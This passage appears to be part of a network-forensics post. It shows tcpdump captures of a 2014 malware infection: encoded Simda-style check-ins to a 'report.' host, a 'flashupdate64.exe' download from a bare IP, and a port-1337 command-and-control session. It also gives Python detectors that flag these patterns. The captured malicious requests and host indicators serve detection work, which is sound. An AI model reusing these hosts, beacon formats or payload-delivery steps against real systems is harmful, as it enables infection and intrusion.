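User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_33
Host: 436sfdh.safebrowsing-cant-stop-me.info

2014-03-15 00:05:43.063778 IP 192.168.1.104.49525 > 79.142.66.240.80: Flags [P.], seq 1:618, ack 1, win 256, length 617
E....2@........hO.B..u.P...X..\oP.......GET /?G1i917=%96%C9%D2%9F%D7%A9_%95%96g%A2i%AC%9A%98%9Bc%99%97%91%97%93%92h%96_%97%A5%9Exc%99%9DW%AE%E8%A2%E7%E5%A9%9A%A3%CE%95t%9Ce%B2h%95%8B%9D%CF%C8%9E%C6%CF%8E%88%84T%D0%D8%D1%84c%AEory%AA%99%B3%A2%A7%A4t%9Atg%ACt%BAh%95%9Ed%A7%A2%9A%93%A3%A5yh_%97%95%DF%AC%A4%A6iag%A2%95%A1%A6%A2%A4%5E%95bg%9Bc%A9g%93%95a%87%D7%9E%91%91%91ca_%A9%B2%93%B9%AB%A6oe%5B HTTP/1.1
Host: report.e17k3y7ce1aaaaaa31[.]com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

2014-03-15 00:05:43.223425 IP 192.168.1.104.49526 > 79.142.66.240.80: Flags [P.], seq 1:609, ack 1, win 256, length 608
E....7@........hO.B..v.P..]xh...P.......GET /?555qG5558=%96%C9%D2%9F%D7%A9_%95%96g%A2i%AC%9A%98%9Bc%99%97%91%97%93%92h%96_%97%A5%9Efge%D5m%AC%ABr%AF%E8%9C%96%E4%DB%D8k%96cp%9Ce%9F%A3%D1%CCn%C6%CF%8E%B6%B4%87%A0%9A%92%A0%A1%B2kvw%A9%7Bxhjh%B8%9A%B3%9F%B3%B5o%96cp%9Ey%BAp%95%A7u%A7%98%92%95%87%D3%98%A4k%93%9F%9Deej%A9weeei%A2%95%A0%9F%A2%A4%5E%95W%AD%A8c%A9g%93%95b%A7%A4%87%D3%DB%9EieR HTTP/1.1
Host: report.e17k3y7ce1aaaaaa31[.]com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

2014-03-15 00:05:44.056929 IP 192.168.1.104.49527 > 5.149.248.85.80: Flags [P.], seq 1:297, ack 1, win 16425, length 296
E..P.<@...'q...h...U.w.PkO._..XeP.@)(...GET /flashupdate64.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 5.149.248.85
"""

PKT_RE = re.compile(r"^\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+ IP (?P<src>\d+(?:\.\d+){3})\.\d+ > "
                    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): Flags")
REQ_RE = re.compile(r"(?P<method>GET|POST) (?P<path>\S+) HTTP/1\.[01]\s*$")
HDR_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*):\s*(.*)$")
JAVA_UA = re.compile(r"\bJava/\d+\.\d+\.\d+_\d+$")      # Java plug-in UA as seen above
IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
BEACON = re.compile(r"^/\?[A-Za-z0-9]+=((?:%[0-9A-Fa-f]{2}|[A-Za-z0-9_])+)$")
OS_TOKEN = re.compile(r"Windows NT \d")                # missing from the Simda UA above
PAYLOAD_EXT = (".jar", ".exe")


def parse_requests(text):
    """One dict per request; the last packet header seen is attached, then cleared."""
    reqs, pkt, cur = [], None, None
    for line in text.splitlines():
        if m := PKT_RE.match(line):
            pkt, cur = m.groupdict(), None
        elif m := REQ_RE.search(line):               # binary residue may precede the GET
            cur = {"method": m["method"], "path": m["path"], "headers": {},
                   **(pkt or {"src": None, "dst": None, "dport": None})}
            reqs.append(cur)
            pkt = None
        elif cur is not None and (m := HDR_RE.match(line)):
            cur["headers"][m.group(1).lower()] = m.group(2)
        elif not line.strip():
            cur = None                               # blank line ends the header block
    return reqs


def high_byte_ratio(value):
    """Fraction of bytes >= 0x80 after %XX decoding; the check-in values above are mostly high."""
    raw = unquote_to_bytes(value)
    return sum(b >= 0x80 for b in raw) / len(raw) if raw else 0.0


def check_request(req):
    """Names of the checks one request trips (empty list for the landing page itself)."""
    hits, h = [], req["headers"]
    ua, host = h.get("user-agent", ""), h.get("host", "")
    base = req["path"].split("&", 1)[0].lower()     # drop the "&h=14" suffix seen above
    if JAVA_UA.search(ua) and base.endswith(PAYLOAD_EXT):
        hits.append("java_plugin_fetches_payload")
    if IPV4_HOST.match(host) and base.endswith(".exe"):
        hits.append("exe_from_bare_ip_host")
    m = BEACON.match(req["path"])
    if m and host.startswith("report.") and high_byte_ratio(m.group(1)) > 0.5:
        hits.append("simda_style_checkin")
        if not OS_TOKEN.search(ua):
            hits.append("ua_without_os_token")
    return hits


def mixed_ua_dirs(reqs):
    """host+directory keys that served both a browser UA and the Java UA (landing page, then .jar)."""
    kinds = {}
    for r in reqs:
        key = r["headers"].get("host", "") + (r["path"].rsplit("/", 1)[0] or "/")
        ua = r["headers"].get("user-agent", "")
        kinds.setdefault(key, set()).add("java" if JAVA_UA.search(ua) else "browser")
    return sorted(k for k, v in kinds.items() if v == {"java", "browser"})


if __name__ == "__main__":
    reqs = parse_requests(SAMPLE)
    for r in reqs:
        print(r["dst"], r["path"][:45], check_request(r))
    print("landing page + payload directories:", mixed_ua_dirs(reqs))
```

Keying the check-in rule on the report. host prefix and the high-byte ratio rather than on the parameter name matters because that name changes between the two check-ins on this page (G1i917, then 555qG5558); the 301 to www.bing[.]com that both receive is the server half of the same pattern and is not parsed here. The parser attaches only the most recent packet header, so the two requests whose header lines were lost from the page come back with src and dst of None rather than a neighbour's addresses.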
2014-03-15 00:19:05.882253 IP 192.168.1.104.49158 > 54.200.248.75.1337: Flags [.], ack 260, win 255, length 0
E..(.T@… X…h6..K…9)M.PX-..P………….
2014-03-15 00:19:28.692079 IP 54.200.248.75.1337 > 192.168.1.104.49158: Flags [P.], seq 260:389, ack 73, win 211, length 129
E…|.@./…6..K…h.9..X-..)M.PP….?………-.Q.M..%..R.h.q.._Y…..\.”.|..aE,.^…..w…….ZR=s…`…#’..#S.[W
………….%.b.v..P………O…………………
2014-03-15 00:19:28.890312 IP 192.168.1.104.49158 > 54.200.248.75.1337: Flags [.], ack 389, win 255, length 0
E..(.U@… W…h6..K…9)M.PX-..P………….
2014-03-15 00:19:54.632328 IP 54.200.248.75.1337 > 192.168.1.104.49158: Flags [P.], seq 389:518, ack 73, win 211, length 129
E…|.@./…6..K…h.9..X-..)M.PP………….0…r…g…..e.
.w}j…D..J{….v.g..vu….\gg..}GA…j.u…….#SY`W
…..o…….%.b.v….k…….O…………………
2014-03-15 00:19:54.833842 IP 192.168.1.104.49158 > 54.200.248.75.1337: Flags [.], ack 518, win 254, length 0
E..(.V@… V…h6..K…9)M.PX-..P………….
2014-03-15 00:20:05.679157 IP 54.200.248.75.1337 > 192.168.1.104.49158: Flags [P.], seq 518:519, ack 73, win 211, length 1
E..)|.@./…6..K…h.9..X-..)M.PP….@……$r
2014-03-15 00:20:05.892149 IP 192.168.1.104.49158 > 54.200.248.75.1337: Flags [.], ack 519, win 254, length 0
E..(.W@… U…h6..K…9)M.PX-..P………….
2014-03-15 00:21:05.679851 IP 54.200.248.75.1337 > 192.168.1.104.49158: Flags [P.], seq 519:520, ack 73, win 211, length 1
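The last session above, to 54.200.248.75 on port 1337, is not HTTP at all: two 129-byte pushes from the server, then 1-byte pushes a minute apart, with the client answering only with ACKs. What follows is an added example, not code from the original post, that reads tcpdump header lines (the -A payload dump is not needed), groups them into a flow and summarises push sizes and the gaps between server pushes. looks_like_keepalive and its thresholds (pushes of at most 4 bytes, a 60 s period with 5 s tolerance, nothing sent by the client) are this example's own heuristic, and SESSION is constructed from the header lines on this page.

```python
# Added example (not code from the original post): summarise the 54.200.248.75:1337
# session above from tcpdump header lines alone. SESSION is constructed from the
# header lines on this page; looks_like_keepalive and its thresholds are this
# example's own heuristic for "tiny pushes at a steady period, client silent".
import re
from datetime import datetime

SESSION = """\
2014-03-15 00:19:05.882253 IP 192.168.1.104.49158 > 54.200.248.75.1337: Flags [.], ack 260, win 255, length 0
2014-03-15 00:19:28.692079 IP 54.200.248.75.1337 > 192.168.1.104.49158: Flags [P.], seq 260:389, ack 73, win 211, length 129
2014-03-15 00:19:28.890312 IP 192.168.1.104.49158 > 54.200.248.75.1337: Flags [.], ack 389, win 255, length 0
2014-03-15 00:19:54.632328 IP 54.200.248.75.1337 > 192.168.1.104.49158: Flags [P.], seq 389:518, ack 73, win 211, length 129
2014-03-15 00:19:54.833842 IP 192.168.1.104.49158 > 54.200.248.75.1337: Flags [.], ack 518, win 254, length 0
2014-03-15 00:20:05.679157 IP 54.200.248.75.1337 > 192.168.1.104.49158: Flags [P.], seq 518:519, ack 73, win 211, length 1
2014-03-15 00:20:05.892149 IP 192.168.1.104.49158 > 54.200.248.75.1337: Flags [.], ack 519, win 254, length 0
2014-03-15 00:21:05.679851 IP 54.200.248.75.1337 > 192.168.1.104.49158: Flags [P.], seq 519:520, ack 73, win 211, length 1
"""

PKT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP (?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\].*length (?P<len>\d+)$")


def parse_packets(text):
    """Header lines only; payload dump lines are ignored, so tcpdump -A output works too."""
    pkts = []
    for line in text.splitlines():
        if m := PKT_RE.match(line):
            p = m.groupdict()
            p["ts"] = datetime.strptime(p["ts"], "%Y-%m-%d %H:%M:%S.%f")
            p["len"] = int(p["len"])
            pkts.append(p)
    return pkts


def flows(pkts):
    """Group packets into bidirectional flows keyed by the sorted (ip, port) pair."""
    out = {}
    for p in pkts:
        key = tuple(sorted([(p["src"], p["sport"]), (p["dst"], p["dport"])]))
        out.setdefault(key, []).append(p)
    return out


def summarise(pkts, server_port):
    """Server push sizes, the gaps between consecutive pushes, and client payload bytes."""
    pushes = [p for p in pkts if p["len"] > 0 and p["sport"] == str(server_port)]
    gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(pushes, pushes[1:])]
    return {"server_pushes": len(pushes),
            "sizes": [p["len"] for p in pushes],
            "gaps_s": [round(g, 1) for g in gaps],
            "client_bytes": sum(p["len"] for p in pkts if p["dport"] == str(server_port))}


def looks_like_keepalive(summary, size_max=4, period_s=60, tol_s=5):
    """At least two tiny pushes, at least one gap near the period, and nothing from the client."""
    small = [s for s in summary["sizes"] if s <= size_max]
    steady = [g for g in summary["gaps_s"] if abs(g - period_s) <= tol_s]
    return len(small) >= 2 and len(steady) >= 1 and summary["client_bytes"] == 0


if __name__ == "__main__":
    for key, pkts in flows(parse_packets(SESSION)).items():
        s = summarise(pkts, 1337)          # the server side of the session above
        print(key, s, "keepalive-like:", looks_like_keepalive(s))
```

On the excerpt above this yields sizes [129, 129, 1, 1], gaps of roughly 25.9 s, 11.0 s and 60.0 s, and zero client payload bytes in this window (the ack 73 in the server's segments shows the client sent 72 bytes earlier, before the excerpt starts). A cadence check like this only becomes meaningful over many minutes of capture; two matching intervals are enough to illustrate the shape, not to alert on.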
